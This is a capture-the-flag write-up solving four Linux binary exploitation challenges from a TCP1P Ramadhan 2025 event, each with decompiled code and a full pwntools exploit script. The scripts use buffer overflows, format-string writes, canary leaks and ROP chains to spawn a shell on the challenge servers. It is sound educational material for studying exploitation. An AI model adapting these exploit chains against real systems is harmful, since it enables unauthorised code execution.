Binary Exploitation
Berbuka Dengan PIE 🥇
9
Perfect 🥇
5
About You 🥇
2
u-turn 🥇
1
Berbuka Dengan PIE
Description
Author: ilupii
Aku dan temanku bingung mau berbuka pake apa, tapi tiba tiba ada orang bagi bagi takjil kue pie
Connect: nc playground.tcp1p.team 19001
Initial Analysis
We are given files:
┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Berbuka Dengan PIE]
└──╼ $tree .
.
├── chall
├── docker-compose.yml
├── Dockerfile
└── flag.txtWe do basic security checks on the file:
┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Berbuka Dengan PIE]
└──╼ $pwn checksec chall
[*] '/home/mirai/ctf/TCP1P Ramadhan 2025/Berbuka Dengan PIE/chall'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Stripped: NoCode Analysis
We open the chall file in IDA:
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // [rsp+Ch] [rbp-4h]
setup(argc, argv, envp);
while ( 1 )
{
menu();
v3 = readint();
if ( v3 == 4 )
{
puts("Bye bye!");
exit(0);
}
if ( v3 > 4 )
{
LABEL_14:
puts("Pilihan tidak valid.");
}
else
{
switch ( v3 )
{
case 3:
vuln();
break;
case 1:
puts("emm enak tuuuu :)");
puts("ak jg mw\n\n");
break;
case 2:
puts("KUEEEEE PIEEEEEE KESUKAANKUUU");
puts("KAMU JUGA MAU?");
puts("BOLEH");
puts("iniiiiiiiiii");
puts("ketik 1 dulu kalau mau ehe");
if ( (unsigned int)readint() == 1 )
printf("oke okeeeyy ini pie nya untukmuu, %p\n", main);
else
puts("\naku marah banget");
break;
default:
goto LABEL_14;
}
}
}
}if ( (unsigned int)readint() == 1 )
printf("oke okeeeyy ini pie nya untukmuu, %p\n", main);
else
puts("\naku marah banget");In here, when we chose the option 2, it will print out the main() address function. Since our binary is PIE enabled, this defeats the PIE enabled protection.
There is also a bug in vuln() function:
int vuln()
{
char s[32]; // [rsp+0h] [rbp-20h] BYREF
puts("WOIII JANGAN MASUK SINIII");
printf("btw, kue pie nya enak gaaakkk hihi : ");
fgets(s, 100, stdin);
return printf("%s\n\n", s);
}An obvious buffer overflow, fgets is taking in 100 characters into buffer s[32].
Since there's is no win function, we will need to do ret2libc.
Exploitation
This one is straightforward, we will just need to calculate the offset from the main() function to the base address. The problem is when we are trying to leak libc. There is no easy way to put a libc address into RDI register since there are no pop rdi; ret; gadgets.
But when we see on debugger, when returning from the vuln() function, the RDI registers is actually populated with funlockfile address. With this knowledge, we can just call puts, calculate the offset from libc.sym['funlockfile'] to get the libc base address and then back to vuln to do a second buffer overflow.
With our leaked libc base address, now we can use the function inside of libc. We can call system("/bin/sh") to get a shell and read the flag.
#!/usr/bin/env python3
from pwn import *
# =========================================================
# SETUP
# =========================================================
exe = './chall_patched'
elf = context.binary = ELF(exe, checksec=True)
libc = './libc.so.6'
libc = ELF(libc, checksec=False)
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h", "-p", "65"]
host, port = 'playground.tcp1p.team', 19001
def initialize(argv=[]):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript)
elif args.REMOTE:
return remote(host, port)
else:
return process([exe] + argv)
gdbscript = '''
init-pwndbg
breakrva 0x1246
'''.format(**locals())
# =========================================================
# EXPLOITS
# =========================================================
def exploit():
global io
io = initialize()
rop = ROP(exe)
io.sendline(b'2')
io.sendline(b'1')
io.recvuntil(b'0x')
# Calculate the offset to the main function
elf.address = int(io.recvline().strip(), 16) - elf.symbols['main']
io.sendline(b'3')
payload = b'A'*40
payload += p64(elf.symbols['puts'])
payload += p64(elf.symbols['vuln']) # Call vuln again to do a second overflow
io.sendlineafter(b':', payload)
io.recvuntil(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
io.recvn(8)
# Calculate the offset to libc base
libc.address = u64(io.recvline().strip().ljust(8, b'\x00')) - libc.symbols['funlockfile']
log.info('Libc base: %#x' % libc.address)
# Now we call system("/bin/sh")
payload = b'A'*40
rop = ROP(libc)
rop.raw(rop.ret.address)
rop.system(next(libc.search(b'/bin/sh\x00')))
io.sendline(payload + rop.chain())
io.interactive()
if __name__ == '__main__':
exploit()
Flag: RAMADAN{kue_pienyya_en4kk4nn_selamat_berbuka}
Perfect
Description
Author: ilupii
i have faith what i see, now i know i have met an angel in person and she looks perfect.... perfect kayak binarynya
Connect: nc playground.tcp1p.team 4156
Initial Analysis
We are given files:
┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Perfect]
└──╼ $tree .
.
├── chall
├── docker-compose.yml
├── Dockerfile
└── flag.txt
1 directory, 4 filesWe do basic security checks on the file:
┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Perfect]
└──╼ $pwn checksec chall
[*] '/home/mirai/ctf/TCP1P Ramadhan 2025/Perfect/chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Stripped: NoCode Analysis
There is a function called perfect():
int perfect()
{
char s[520]; // [rsp+0h] [rbp-210h] BYREF
unsigned __int64 v2; // [rsp+208h] [rbp-8h]
v2 = __readfsqword(0x28u);
fflush(_bss_start);
puts("sebutkan di dunia ini apa yang 'Perfect' menurut kamu?");
fgets(s, 512, stdin);
printf(s);
puts("apa alasan mengapa dia itu perfect ?");
fgets(s, 512, stdin);
printf(s);
puts("\nnahh. 'i dont deserve this, she look perfect tonight:)");
return fflush(_bss_start);
}Though there are no buffer overflow, this function is vulnerable to format string vulnerability, on line 10 and 13. With format string vulnerability, we can do arbitrary read and arbitrary write. We are given two format string. So my instant thought is first to leak saved RIP of the current stack and also leak libc address, then on the second format string, we can write a one gadget.
Exploitation
We found that the stack address and libc address lives at offset %1$p and %67$p . We then calculate the stack address offset to current stack RIP and calculate libc base address.
With these leaks in our hand, we can overwrite at any address using the second format string vulnerability. Thankfully, pwntools have the automation just to do that.
one_gadgets = [0xebc81, 0xebc85, 0xebc88, 0xebce2, 0xebd38, 0xebd3f, 0xebd43]
payload = fmtstr_payload(6, {rip: one_gadgets[0] + libc.address}, write_size='short')Here i dumped one gadget using this tool:
┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/Perfect]
└──╼ $one_gadget libc
0xebc81 execve("/bin/sh", r10, [rbp-0x70])
constraints:
address rbp-0x78 is writable
[r10] == NULL || r10 == NULL || r10 is a valid argv
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
0xebc85 execve("/bin/sh", r10, rdx)
constraints:
address rbp-0x78 is writable
[r10] == NULL || r10 == NULL || r10 is a valid argv
[rdx] == NULL || rdx == NULL || rdx is a valid envp
0xebc88 execve("/bin/sh", rsi, rdx)
constraints:
address rbp-0x78 is writable
[rsi] == NULL || rsi == NULL || rsi is a valid argv
[rdx] == NULL || rdx == NULL || rdx is a valid envp
0xebce2 execve("/bin/sh", rbp-0x50, r12)
constraints:
address rbp-0x48 is writable
r13 == NULL || {"/bin/sh", r13, NULL} is a valid argv
[r12] == NULL || r12 == NULL || r12 is a valid envp
0xebd38 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
address rbp-0x48 is writable
r12 == NULL || {"/bin/sh", r12, NULL} is a valid argv
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
0xebd3f execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
address rbp-0x48 is writable
rax == NULL || {rax, r12, NULL} is a valid argv
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp
0xebd43 execve("/bin/sh", rbp-0x50, [rbp-0x70])
constraints:
address rbp-0x50 is writable
rax == NULL || {rax, [rbp-0x48], NULL} is a valid argv
[[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envpWhen we send the payload, the return address will look like this:
And we just continue execution and we will pop a shell.
#!/usr/bin/env python3
from pwn import *
# =========================================================
# SETUP
# =========================================================
exe = './chall_patched'
elf = context.binary = ELF(exe, checksec=True)
libc = './libc'
libc = ELF(libc, checksec=False)
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h", "-p", "65"]
host, port = 'playground.tcp1p.team', 4156
def initialize(argv=[]):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript)
elif args.REMOTE:
return remote(host, port)
else:
return process([exe] + argv)
gdbscript = '''
init-pwndbg
breakrva 0x1326
'''.format(**locals())
# =========================================================
# EXPLOITS
# =========================================================
def exploit():
global io
io = initialize()
payload = b'%1$p|%67$p'
io.sendlineafter(b'?', payload)
io.recvn(1)
libc.address = int(io.recvn(14), 16) - libc.sym['_IO_2_1_stdin_'] - 131
io.recvn(1)
stack_leak = int(io.recvn(14), 16)
rip = stack_leak + 0x8
one_gadgets = [0xebc81, 0xebc85, 0xebc88, 0xebce2, 0xebd38, 0xebd3f, 0xebd43]
payload = fmtstr_payload(6, {rip: one_gadgets[0] + libc.address}, write_size='short')
io.sendlineafter(b'?', payload)
io.recvuntil(b"tonight:)\n")
info(f'libc: {hex(libc.address)}')
info(f'stack: {hex(stack_leak)}')
info(f'rip: {hex(rip)}')
io.interactive()
if __name__ == '__main__':
exploit()
Flag: RAMADAN{Ch1ll_br0_jusT_a_ret2win_w1th_f0rmat_string}
About You
Description
Author: ilupii
Do you think I have forgotten?
Connection: nc playground.tcp1p.team 19121
Initial Analysis
We are given files:
┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/About You]
└──╼ $tree .
.
├── chall
├── docker-compose.yml
├── Dockerfile
├── flag.txt
└── libc.so.6
1 directory, 5 filesWe do basic security check:
┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/About You]
└──╼ $pwn checksec chall
[*] '/home/mirai/ctf/TCP1P Ramadhan 2025/About You/chall'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Stripped: NoTried to run it:
Code Analysis
There are several functions:
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
int v3; // [rsp+Ch] [rbp-4h]
setup(argc, argv, envp);
puts("Mau tinggalkan pesan untuk seseorang gak????????");
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
menu();
printf("> ");
v3 = readint();
if ( v3 == 4 )
{
puts("bye");
exit(0);
}
if ( v3 <= 4 )
break;
LABEL_13:
puts("pilih yg bener dong");
}
if ( v3 != 3 )
break;
LABEL_11:
puts("dalam perbaikan!!!");
}
if ( v3 > 3 )
goto LABEL_13;
if ( v3 != 1 )
{
if ( v3 != 2 )
goto LABEL_13;
siapa();
goto LABEL_11;
}
mw();
}
}Here we see that there is a function called siapa() and mw() .
unsigned __int64 siapa()
{
char rand; // [rsp+Ch] [rbp-74h]
char s[104]; // [rsp+10h] [rbp-70h] BYREF
unsigned __int64 v3; // [rsp+78h] [rbp-8h]
v3 = __readfsqword(0x28u);
rand = get_rand();
printf("> ");
fgets(s, 100, stdin);
xor_encrypt(s, (unsigned int)rand);
printf("hai : ");
printf(s);
putchar(10);
return v3 - __readfsqword(0x28u);
}We can see that there's a format string vulnerability at line 13. But first we need to see the get_rand() function first:
__int64 get_rand()
{
int v0; // eax
unsigned int seed; // [rsp+Ch] [rbp-4h]
seed = time(0LL);
srand(seed);
v0 = rand();
return (unsigned __int8)(((unsigned int)(v0 >> 31) >> 24) + v0) - ((unsigned int)(v0 >> 31) >> 24);
}This code essentially sets up a seed using the current time, then generate a random number, then essentially taking only the lowest 8 bits of the rand() value. Equivalent with v0 & 0xff
Then there is xor_encrypt(s, rand):
size_t __fastcall xor_encrypt(const char *a1, char a2)
{
size_t i; // rax
size_t v4; // [rsp+18h] [rbp-8h]
v4 = 0LL;
for ( i = strlen(a1); v4 < i; i = strlen(a1) )
a1[v4++] ^= a2;
return v4;
}This function basically xor'ing every character in the string with the value from rand.
Knowing that:
We can XOR our chosen payload with the rand on server, and in the server, it will XOR it again, making it decrypted and reflect our actual payload. But in this case we want to use the format string, so we chose our payload so that it can leak addresses and stack canaries.
Then we go to the mw() function:
unsigned __int64 mw()
{
char s[72]; // [rsp+0h] [rbp-50h] BYREF
unsigned __int64 v2; // [rsp+48h] [rbp-8h]
v2 = __readfsqword(0x28u);
printf("> ");
fgets(s, 256, stdin);
puts("oke");
return v2 - __readfsqword(0x28u);
}There's an obvious buffer overflow, fgets is taking 256 character into a buffer s[72]
Exploitation
So the idea is:
Leak addresses and canaries via format string, but first we need to XOR our payload with the random value
Do ret2libc
#!/usr/bin/env python3
from pwn import *
from ctypes import CDLL
# =========================================================
# SETUP
# =========================================================
exe = './chall_patched'
elf = context.binary = ELF(exe, checksec=True)
libc = './libc'
libc = ELF(libc, checksec=False)
libr = CDLL("libc.so.6")
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h", "-p", "65"]
host, port = 'playground.tcp1p.team', 19121
def initialize(argv=[]):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript)
elif args.REMOTE:
return remote(host, port)
else:
return process([exe] + argv)
gdbscript = '''
init-pwndbg
'''.format(**locals())
def siapa(payload):
payload = xor(payload,libr.rand() & 0xff)
io.sendlineafter(b'>', b'2')
io.sendlineafter(b'>', payload)
def mw(payload):
io.sendlineafter(b'>', b'1')
io.sendlineafter(b'>', payload)
# =========================================================
# EXPLOITS
# =========================================================
def exploit():
global io
io = initialize()
rop = ROP(exe)
libr.srand(libr.time(0))
siapa(b'%21$p|%27$p')
response = io.recvline().strip()
if b'0x' not in response:
error('nuh uh')
return
response = response[6:]
canary = int(response.split(b'|')[0], 16)
libc.address = int(response.split(b'|')[1][:14], 16) - 0x29d90
rop = ROP(libc)
rop.raw(p64(rop.ret.address) * 9)
rop.raw(canary)
rop.call(p64(rop.ret.address) * 2)
rop.system(next(libc.search(b'/bin/sh\x00')))
mw(rop.chain())
log.info(f'canary: {hex(canary)}')
log.info(f'libc: {hex(libc.address)}')
io.interactive()
if __name__ == '__main__':
exploit()
Flag: RAMADAN{ROP_with_leak_printf_it_easy_right????????????????}
u-turn
Description
Author: nouxia
turn 360 degrees and walk away
Connect: nc playground.tcp1p.team 33132
Initial Analysis
We are given files:
┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/u-turn]
└──╼ $tree .
.
├── chall
├── ld-linux-x86-64.so.2
└── libc.so.6
1 directory, 3 filesWe do basic security checks:
┌─[mirai@parrot]─[~/ctf/TCP1P Ramadhan 2025/u-turn]
└──╼ $pwn checksec chall
[*] '/home/mirai/ctf/TCP1P Ramadhan 2025/u-turn/chall'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: NoCode Analysis
There's a single function called vuln():
int vuln()
{
_BYTE v1[256]; // [rsp+0h] [rbp-100h] BYREF
printf("Good luck!\n>> ");
__isoc99_scanf("%256s", v1);
return printf("Goodbye!\n");
}At first glance, this code didn't seem vulnerable to anything. But knowing that scanf appends null byte at the end of input. This code is instantly vulnerable to an off-by-one null byte overflow.
Exploitation
Finding the Offset
At first, i tried to fuzz this to find the offset where i start to overflow the buffer.
payload = cyclic(0x100, n=8)
io.sendlineafter(b'>> ', payload)
The offsets when we overwrite RIP is always different.
At this point, i am clueless, so i tried asking my friend Hygge, he said "why not just use ret slep", so i did just that.
With that knowledge in mind, i changed my payload to this:
payload = p64(rop.ret.address) * 31
payload += b'A'*8
io.sendlineafter(b'>> ', payload)
Leaking libc
To leak libc, we can take a look the register state before it returns from vuln:
RDI points to libc.sym['funlockfile'] address, now we already have libc address in RDI, we will just need to call printf to get the leak.
Getting back to vuln
We will try to go back to vuln to get a second overflow. But, when we try to go back to vuln like this:
payload = p64(rop.ret.address) * 30 + p64(elf.plt['printf']) + p64(elf.sym['vuln'])
io.sendlineafter(b'>> ', payload)We are greeted with this error:
To counter this error, we can do a technique called ret2start. This will restart the binary. Restoring the stack state just like when we first executed the binary.
payload = p64(rop.ret.address) * 30 + p64(elf.plt['printf']) + p64(elf.sym['_start'])
io.sendlineafter(b'>> ', payload)Now we do the same thing with the second overflow, but with the target execve("/bin/sh", 0, 0) because system("/bin/sh") always throws an error:
libc.address = u64(io.recv(6).ljust(8, b'\0')) - libc.sym['funlockfile']
rop = ROP(libc)
rop.raw(p64(rop.ret.address) * 23)
rop(rdi=next(libc.search(b'/bin/sh\x00')), rsi=0, rdx=0, rax=0x3b)
rop.call(rop.find_gadget(['syscall', 'ret'])[0])
io.sendlineafter(b'>> ', rop.chain())We try to exploit this against the remote server we will got the flag:
#!/usr/bin/env python3
from pwn import *
# =========================================================
# SETUP
# =========================================================
exe = './chall_patched'
elf = context.binary = ELF(exe, checksec=True)
libc = './libc'
libc = ELF(libc, checksec=False)
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h", "-p", "65"]
host, port = 'playground.tcp1p.team', 33132
def initialize(argv=[]):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript)
elif args.REMOTE:
return remote(host, port)
else:
return process([exe] + argv)
gdbscript = '''
init-pwndbg
# break *vuln
# break *vuln+72
break *0x00000000004011cc
# break *0x4011b2
break *vuln
'''.format(**locals())
# =========================================================
# EXPLOITS
# =========================================================
def exploit():
global io
io = initialize()
rop = ROP(exe)
payload = p64(rop.ret.address) * 30 + p64(elf.plt['printf']) + p64(elf.sym['_start'])
io.sendlineafter(b'>> ', payload)
io.recvline()
libc.address = u64(io.recv(6).ljust(8, b'\0')) - libc.sym['funlockfile']
rop = ROP(libc)
rop.raw(p64(rop.ret.address) * 23)
rop(rdi=next(libc.search(b'/bin/sh\x00')), rsi=0, rdx=0, rax=0x3b)
rop.call(rop.find_gadget(['syscall', 'ret'])[0])
io.sendlineafter(b'>> ', rop.chain())
success(f'libc @ {hex(libc.address)}')
io.interactive()
if __name__ == '__main__':
exploit()Flag: RAMADAN{RbP_nUlL_By73_574cK_P1V07}
Last updated